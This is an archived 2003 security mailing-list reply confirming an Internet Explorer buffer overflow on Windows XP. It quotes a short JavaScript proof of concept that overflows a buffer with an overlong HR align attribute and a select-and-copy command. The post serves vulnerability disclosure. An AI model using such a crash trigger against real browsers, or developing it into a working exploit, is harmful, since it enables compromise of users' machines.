OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Re: Internet Explorer >=5.0 : Buffer overflow

From: KF (dotslashsnosoft.com)
Date: Mon Jun 23 2003 - 11:43:06 CDT


I can confirm this on Windows XP Professional

version 6.0.2800.1106.xpsp2-030422-1633

0x43534c41 refrenced mem at 0x43534c41
-KF

Digital Scream wrote:

><script>
> wnd=open("about:blank","","");
> wnd.moveTo(screen.Width,screen.Height);
> WndDoc=wnd.document;
> WndDoc.open();
> WndDoc.clear();
> buffer="";
> for(i=1;i<=127;i++)buffer+="X";
> buffer+="DigitalScream";
> WndDoc.write("<HR align='"+buffer+"'>");
> WndDoc.execCommand("SelectAll");
> WndDoc.execCommand("Copy");
> wnd.close();
>&lt;/script&gt;
>
>Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
>
>
>